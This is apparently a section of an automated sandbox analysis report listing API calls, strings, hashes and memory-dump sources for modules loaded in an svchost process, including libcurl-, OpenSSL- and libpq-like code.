                          • Opcode Fuzzy Hash: 1151bc5a76b257bebab38f2b3411b41006c6163fbd03b349323ada81ee6bbd9b
                          • Instruction Fuzzy Hash: A9D15D32B0EF8282EB10AB56E4501E963A6FB85BC4F544032DE4E67B9ADF3ED155C704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: free$ContextCredentialsDeleteFreeHandleSecurityclosesocket
                          • String ID: show password_encryption
                          • API String ID: 1081927107-3405507779
                          • Opcode ID: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                          • Instruction ID: 581b433942037c7f43b08aede69611a5a0501e8bc2aa1b82b7eecf6fe82e60df
                          • Opcode Fuzzy Hash: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                          • Instruction Fuzzy Hash: EF414E35B06B8192E69D8F21E5602B9B761FB48FA0F084735CB6D23795CF39F4A18308
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuery
                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                          • API String ID: 2783962273-3359130258
                          • Opcode ID: 5ec9e25f208905917076be8a858fe11dc98c1fedafb3a8959701a46d42f27656
                          • Instruction ID: 96323609c65e5f075b90c33d837516779dec8c2ffc160bbd6e00444b05dcd493
                          • Opcode Fuzzy Hash: 5ec9e25f208905917076be8a858fe11dc98c1fedafb3a8959701a46d42f27656
                          • Instruction Fuzzy Hash: 3232BF26B0D68A8AFB168FB5D4103BC33A1BB06FA8F044635DE5D67786EF38A551C344
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup$callocfreestrncmp
                          • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %lld ms$Unix socket path too long: '%s'$localhost/
                          • API String ID: 349811053-652210993
                          • Opcode ID: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                          • Instruction ID: c8aadf97d4ab95d94c9be9159304a666136b4c724e2921b4b9c92adc099197eb
                          • Opcode Fuzzy Hash: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                          • Instruction Fuzzy Hash: 31713729B0AB8A86FB66DF24E4607B923A0FB46F84F444031DE8D47786EF2DE454C744
                          APIs
                          • LoadLibraryW.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E77CD
                          • GetLastError.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E77DF
                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E7821
                          • VirtualProtect.KERNEL32 ref: 00007FFD942E787D
                          • VirtualProtect.KERNEL32 ref: 00007FFD942E78AE
                          • FreeLibrary.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E78F2
                          • GetProcAddressForCaller.KERNELBASE(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E78FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressCallerErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 983678269-1880043860
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$Last$Status$CloseHandle$AttributesErrorFile
                          • String ID:
                          • API String ID: 2758595869-0
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFDA3398692), ref: 00007FFDA33987D5
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFDA3398692), ref: 00007FFDA33987ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_newR_set_debug
                          • String ID: ssl\statem\statem.c$write_state_machine
                          • API String ID: 193678381-3145639028
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(?,00007FFDA337612C,?,00007FFDA335F4D2,?,00007FFDA3360F40), ref: 00007FFDA333699C
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFDA337612C,?,00007FFDA335F4D2,?,00007FFDA3360F40), ref: 00007FFDA33369B4
                          • ERR_set_error.LIBCRYPTO-3-X64(?,00007FFDA337612C,?,00007FFDA335F4D2,?,00007FFDA3360F40), ref: 00007FFDA33369C4
                          • ASYNC_get_current_job.LIBCRYPTO-3-X64 ref: 00007FFDA3336A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: C_get_current_jobR_newR_set_debugR_set_error
                          • String ID: SSL_do_handshake$expect_quic$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                          • API String ID: 2134390360-1983154402
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: malloc$ErrorLastStartupmemset
                          • String ID:
                          • API String ID: 4264553866-3916222277
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$connect
                          • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                          • API String ID: 375857812-3816509080
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          APIs
                          Strings
                          • D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c, xrefs: 00007FFDA37943DD
                          • (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D, xrefs: 00007FFDA37943E4
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: Last$CreateErrorFileStatus_wassert
                          • String ID: (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D$D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c
                          • API String ID: 4152205889-1407915
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$CloseHandleLastStatus
                          • String ID:
                          • API String ID: 573794993-0
                          APIs
                          • GetLastError.KERNEL32 ref: 00007FFD942E711F
                          • SetLastError.KERNEL32 ref: 00007FFD942E713E
                          • FlsSetValue.KERNEL32 ref: 00007FFD942E7167
                          • FlsSetValue.KERNEL32 ref: 00007FFD942E7178
                          • FlsSetValue.KERNEL32 ref: 00007FFD942E7189
                            • Part of subcall function 00007FFD942E6D40: HeapFree.KERNEL32(?,?,17AB402583480000,00007FFD942F2CFA,?,?,?,00007FFD942F3077,?,?,00000000,00007FFD942F1E21,?,?,00007FFD942E6A0E,00007FFD942F1D53), ref: 00007FFD942E6D56
                            • Part of subcall function 00007FFD942E6D40: GetLastError.KERNEL32(?,?,17AB402583480000,00007FFD942F2CFA,?,?,?,00007FFD942F3077,?,?,00000000,00007FFD942F1E21,?,?,00007FFD942E6A0E,00007FFD942F1D53), ref: 00007FFD942E6D60
                          • SetLastError.KERNEL32 ref: 00007FFD942E71AC
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_zallocR_newR_set_debugR_set_error
                          • String ID: ssl\record\methods\tls_common.c$tls_new_record_layer
                          • API String ID: 3755831613-2134088818
                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA3782E24
                            • Part of subcall function 00007FFDA378C3B0: Sleep.KERNEL32(?,?,?,00007FFDA3782E38,?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA378C3D2
                            • Part of subcall function 00007FFDA378C3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFDA3782E38,?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA378C3F0
                            • Part of subcall function 00007FFDA378C3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFDA3782E38,?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA378C406
                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA3782E4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterErrorInitializeLastSleepgetenv
                          • String ID: /share/locale$PGLOCALEDIR$libpq-16
                          • API String ID: 4109591470-900106006
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                          • API String ID: 0-551583306
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: callocfree
                          • String ID:
                          • API String ID: 306872129-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: FormatMessagestrchrwcstombs
                          • String ID: Unknown error
                          • API String ID: 4171340688-83687255
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFD942F8C55,?,00007FFD942CA8D5,?), ref: 00007FFD942ED106
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          APIs
                            • Part of subcall function 00007FFDA3353F40: ENGINE_finish.LIBCRYPTO-3-X64(?,00007FFDA333EE67,?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA3353F72
                          • ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE6C
                          • OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE73
                          • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE81
                          • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE89
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: E_finishJ_nid2snR_fetchR_pop_to_markR_set_mark
                          • String ID:
                          • API String ID: 3538331334-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                          • API String ID: 0-3791222319
                          • Opcode ID: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                          • Instruction ID: 171f72810d4e27c2b757d771621513500b6443285c7f989378c1070174215bea
                          • Opcode Fuzzy Hash: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                          • Instruction Fuzzy Hash: 2241D339B0E64A81EA21CE2695243796690AF43FE8F548630DE7D07BD7EF3DE0418708
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                          • String ID: x543664
                          • API String ID: 2371198981-674063047
                          • Opcode ID: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                          • Instruction ID: 62d78ff30dabd57abd03ccedc7599697f146824d0058e5f5c02738b5ece406c7
                          • Opcode Fuzzy Hash: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                          • Instruction Fuzzy Hash: D431A062F05B4181EA29DBA5D1A03682290FF56BF4F248731DA7D426D6EE7ED4D2C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: FolderPathmemset
                          • String ID: %s/postgresql
                          • API String ID: 2932979005-376571750
                          • Opcode ID: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                          • Instruction ID: 464c74d7c3bc94afe72dadee665fd8383c7ebb9ec214d9367e105aece292d3db
                          • Opcode Fuzzy Hash: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                          • Instruction Fuzzy Hash: 1001FC32B2DA8182EBB08B21F461BFA7362EB88784F805131D94D17B46CE3DD005CB04
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: freemalloc
                          • String ID: %u/%ld/%s
                          • API String ID: 3061335427-1579391714
                          • Opcode ID: 6e01879f14104608e8d482a9960c4a0608cb097af282014483f6cf99bded7ff6
                          • Instruction ID: de6c0f1ee6c90216429938cd4ddbd9a0153f7513fea3ba5688f470df06f13fd2
                          • Opcode Fuzzy Hash: 6e01879f14104608e8d482a9960c4a0608cb097af282014483f6cf99bded7ff6
                          • Instruction Fuzzy Hash: F261AF6AB0EB8A86EB628F11E4607AA3775FB46F84F444531DE4D0B786CF38E505C714
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastSleepgetsockopt
                          • String ID:
                          • API String ID: 3033474312-0
                          • Opcode ID: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                          • Instruction ID: 28b4d6e1d4d903c7ae30f8dc6c7d3a49b22a6285eda8eead78f2c1942f320598
                          • Opcode Fuzzy Hash: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                          • Instruction Fuzzy Hash: D5018F37B0D68793E7698F11E46433AA7A0AB46B90F244834EE8D82B99DF3DD444CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: E_finishE_freeX509_free
                          • String ID:
                          • API String ID: 769585774-0
                          • Opcode ID: b59662237c3bc5e40f8e3037610cea79ead3f114ad4d00d2abc8a578c68cf0d8
                          • Instruction ID: 6511e38d3030e8abe19eb916aafc696fa22e227fb1494b360e8df15e8ecf67a1
                          • Opcode Fuzzy Hash: b59662237c3bc5e40f8e3037610cea79ead3f114ad4d00d2abc8a578c68cf0d8
                          • Instruction Fuzzy Hash: 6711A962B8B6C386EB65DF20D1713B83611EF40F89F1C0039DB492A387CF3A91818328
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA557A4D4), ref: 00007FFDA558656B
                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA557A4D4), ref: 00007FFDA5586591
                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA557A4D4), ref: 00007FFDA55865A5
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ExclusiveLock$Release$Acquire
                          • String ID:
                          • API String ID: 1021914862-0
                          • Opcode ID: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                          • Instruction ID: bf1971222a595a6056592c638902e7d5701a09bb673b6a02a1be697c76d600e5
                          • Opcode Fuzzy Hash: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                          • Instruction Fuzzy Hash: 77F0121AF2B80BC1E705DF51EC753751291AF95B50FC04030D00E427A2DE2CE5598744
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: malloc$memmove
                          • String ID:
                          • API String ID: 1808909948-0
